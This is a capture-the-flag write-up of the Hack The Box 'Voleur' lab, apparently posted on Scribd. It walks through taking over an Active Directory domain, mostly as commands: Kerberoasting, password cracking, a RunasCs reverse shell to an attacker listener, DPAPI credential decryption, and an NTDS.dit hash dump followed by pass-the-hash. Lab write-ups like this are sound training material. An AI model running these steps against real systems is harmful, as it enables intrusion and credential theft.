Scribd
Upload
4K views1 page

Voleur

The document outlines a penetration testing process on the Voleur box, detailing the use of Kerberos authentication to access various resources and extract sensitive information. Key steps include generating Kerberos tickets, accessing SMB shares, cracking password hashes, and restoring deleted Active Directory users. The process culminates in obtaining both user and root flags through various attacks and exploitation techniques.

Uploaded by

Ivo Ponso
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
4K views1 page

Voleur

The document outlines a penetration testing process on the Voleur box, detailing the use of Kerberos authentication to access various resources and extract sensitive information. Key steps include generating Kerberos tickets, accessing SMB shares, cracking password hashes, and restoring deleted Active Directory users. The process culminates in obtaining both user and root flags through various attacks and exploitation techniques.

Uploaded by

Ivo Ponso
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1

Voleur

Voleur

IP

10.129.71.253

Domain/Hosts

dc.voleur.htb VOLEUR.HTB

/etc/krb5conf

default_realm = VOLEUR.HTB
dns_lookup_realm = false
dns_lookup_kdc = false
ticket_lifetime = 24h
renew_lifetime = 7d
forwardable = true

[realms]
VOLEUR.HTB = {
kdc = 10.129.71.253
admin_server = 10.129.71.253
default_domain = voleur.htb
}

[domain_realm]
.voleur.htb = VOLEUR.HTB
voleur.htb = VOLEUR.HTB

Info

As is common in real life Windows pentests, you will start the Voleur box with credentials for the
following account: ryan.naylor / HollowOct31Nyt

Nmap Results

SMB Enumeartion
We generate a Kerberos TGT for user Ryan Naylor using netexec with password authentication

netexec smb DC.VOLEUR.HTB -u ryan.naylor -p 'HollowOct31Nyt' -k --generate-tgt ryan.naylor

We set the Kerberos ticket cache environment variable to use Ryan Naylor’s TGT

export KRB5CCNAME=ryan.naylor.ccache

We verify the current Kerberos ticket

klist

We list available SMB shares on DC.VOLEUR.HTB using netexec with Kerberos authentication

netexec smb DC.VOLEUR.HTB -u ryan.naylor -p 'HollowOct31Nyt' -k --shares

Whe got some interessting Shares

We connect to DC.VOLEUR.HTB using smbclient.py with Kerberos ticket authentication

KRB5CCNAME=ryan.naylor.ccache smbclient.py -k DC.VOLEUR.HTB

use IT
cd First-Line Support
get Access_Review.xlsx

Creds in Access_Review.xls

Warning

The Access_Review.xlsx file is protected with a password

We extract the password hash from Access_Review.xlsx using office2john and save it to hash.txt

office2john Access_Review.xlsx >> hash.txt

**We crack the extracted password hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

football1 (Access_Review.xlsx) ✅

We create a Python virtual environment, install msoffcrypto-tool

python3 -m venv venv


source venv/bin/activate
pip install msoffcrypto-tool

cd /mnt/NASDF017E/#Kali/HTB/Voleur_HTB

python3 -m msoffcrypto -p football1 Access_Review.xlsx entschluesselt_Access_Review.xlsx

I was open the Sheat in https://jumpshare.com/viewer/xlsx (because no tool installed for View xlsx files ) 😁

🔐 ServiceAccounts Passwords in Access_Review.xls

User Password

svc_ldap M1XyC9pW7qT5Vn

svc_iis N5pXyV1WqM7CZ8

Important

We obtain a hint that the deleted user Todd.Wolfe had the password NightT1meP1dg3on14

Attack Chain
We run bloodhound-python with Ryan Naylor's credentials to collect all Active Directory data from
the VOLEUR.HTB domain, using Kerberos and outputting a zipped report

bloodhound-python -u ryan.naylor -p 'HollowOct31Nyt' -c All -d VOLEUR.HTB -ns 10.129.71.253


--zip -k

➡️ svc_ldap have GenericWrite on lacey.miller and WriteSPN on svc_winrm

We generate a Kerberos TGT for svc_ldap on DC.VOLEUR.HTB using netexec with password
authentication

netexec smb DC.VOLEUR.HTB -u svc_ldap -p 'M1XyC9pW7qT5Vn' -k --generate-tgt svc_ldap

We set the Kerberos ticket cache environment variable to use svc_ldap’s TGT

export KRB5CCNAME=svc_ldap.ccache

We perform a targeted Kerberoast attack using the svc_ldap account with Kerberos authentication
against dc.voleur.htb

targetedKerberoast.py -k --dc-host dc.voleur.htb -u svc_ldap -d voleur.htb

We crack Kerberos password hashes using John the Ripper with the RockYou wordlist

john --wordlist=/usr/share/wordlists/rockyou.txt hashes_kerberos.txt

Just the hash from svc_winrm can be cracked

We generate a Kerberos TGT for svc_winrm on DC.VOLEUR.HTB using netexec with password
authentication

netexec smb DC.VOLEUR.HTB -u svc_winrm -p 'AFireInsidedeOzarctica980219afi' -k --generate-tgt


svc_winrm

We set the Kerberos ticket cache environment variable to use svc_winrm’s TGT

export KRB5CCNAME=svc_winrm.ccache

We connect to dc.voleur.htb using evil-winrm with Kerberos authentication as svc_winrm

evil-winrm -i dc.voleur.htb -k -u svc_winrm -r VOLEUR.HTB

User Flag 🏁
We got the User Flag

type C:\Users\svc_winrm\Desktop\user.txt

Restore User todd.wolfe


svc_ldap is in the RESTORE_USERS Group so i think him can restore the User todd.wolfe

We create a tools directory on the target and upload RunasCs.exe to it

mkdir C:\tools
cd C:\tools

upload RunasCs.exe

Start a listener

nc -lvnp 4444

.\RunasCs.exe svc_ldap M1XyC9pW7qT5Vn cmd.exe -r 10.10.16.xx:4444

Whe got a Shell als svc_ldap

Switch to Powershell

powershell

**We query Active Directory for all deleted user objects , retrieving their ObjectGUIDs, SIDs, and last
known parent OUs

Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects
-Properties objectSid, lastKnownParent, ObjectGUID | Select-Object Name, ObjectGUID,
objectSid, lastKnownParent | Format-List

We restore the deleted Active Directory object with the specified ObjectGUID

Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db'

Whe comfirm that todd.wolfe are back

net user /domain

IT Share second-line
We generate a Kerberos TGT for todd.wolfe on DC.VOLEUR.HTB using netexec with password
authentication

netexec smb DC.VOLEUR.HTB -u todd.wolfe -p 'NightT1meP1dg3on14' -k --generate-tgt todd.wolfe

We set the Kerberos ticket cache environment variable to use todd.wolfe’s TGT

export KRB5CCNAME=todd.wolfe.ccache

We connect to DC.VOLEUR.HTB using smbclient.py with Kerberos ticket authentication for


todd.wolfe

KRB5CCNAME=todd.wolfe.ccache smbclient.py -k DC.VOLEUR.HTB

We download credential and DPAPI masterkey files from Todd Wolfe's archived user profile via
SMB

mget /Second-Line Support/Archived


Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/772275FAD58525253490A9B0039791D3

mget /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/S-1-5-


21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88

We decrypt Todd Wolfe’s DPAPI masterkey file using dpapi.py with his SID and password

dpapi.py masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-


1337352550-2781715495-1110 -password NightT1meP1dg3on14

We decrypt Todd Wolfe’s DPAPI credential file using dpapi.py with the extracted masterkey

dpapi.py credential -file 772275FAD58525253490A9B0039791D3 -key


0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e2
40ce2b8a9dfb92a0d15969ccae6f550650a83

Username : jeremy.combs
Unknown : qT3V9pLXyN7W4m

IT Share Third-Line
We generate a Kerberos TGT for jeremy.combs on DC.VOLEUR.HTB using netexec with password
authentication

netexec smb DC.VOLEUR.HTB -u jeremy.combs -p 'qT3V9pLXyN7W4m' -k --generate-tgt jeremy.combs

We set the Kerberos ticket cache environment variable to use `jeremy.comb's` TGT**

export KRB5CCNAME=jeremy.combs.ccache

We connect to DC.VOLEUR.HTB using smbclient.py with Kerberos ticket authentication for


todd.wolfe

KRB5CCNAME=jeremy.combs.ccache smbclient.py -k DC.VOLEUR.HTB

We download the id_rsa private SSH key and the Note.txt file from the "Third-Line Support" SMB
share directory

mget /Third-Line Support/id_rsa


mget /Third-Line Support/Note.txt.txt

SSH Shell as svc_backup


Note.txt.txt

The Admin is frustrated with Windows Backup and has partially configured WSL (Windows
Subsystem for Linux) to explore using Linux-based backup tools instead. They asked Jeremy to set
it up further.

Since this is about backup jobs , we will test SSH access using the svc_backup account.

We set strict permissions on the id_rsa SSH private key file using chmod 600

chmod 600 id_rsa

We connect via SSH to voleur.htb as svc_backup on port 2222 using the downloaded id_rsa
private key

ssh [email protected] -p 2222 -i id_rsa

We list the contents of the Active Directory and registry backup folders within the Third-Line Support
Backups directory
(While connected as jeremy.combs , the folder was not visible due to permission restrictions)

ls '/mnt/c/IT/Third-Line Support/Backups/Active Directory'


ls '/mnt/c/IT/Third-Line Support/Backups/registry'

We securely copy all files from the Active Directory and registry backup directories on voleur.htb
to the local machine using SCP with the id_rsa key on port 2222

scp -P 2222 -i id_rsa [email protected]:/mnt/c/IT/Third-Line\ Support/Backups/Active\


Directory/* ./ && \

scp -P 2222 -i id_rsa [email protected]:/mnt/c/IT/Third-Line\ Support/Backups/registry/*


./

NTDS Attack
We extract Active Directory user hashes from the local SYSTEM and NTDS.dit files using
secretsdump.py

secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL

We request a Kerberos TGT for the administrator account in voleur.htb using the NTLM hash with
getTGT.py

getTGT.py -hashes :e656e07c56d831611bxxxxxb259ad2 -dc-ip 10.129.71.253


voleur.htb/administrator

We set the Kerberos ticket cache environment variable to use the administrator’s TGT

export KRB5CCNAME=administrator.ccache

We connect to dc.voleur.htb using evil-winrm with Kerberos authentication as administrator

evil-winrm -i dc.voleur.htb -k -u administrator -r VOLEUR.HTB

Root Flag 🏁
Whe got the Root Flag 🏁💪

type C:\Users\Administrator\Desktop\root.txt

By 2ubZ3r0

1/1

You might also like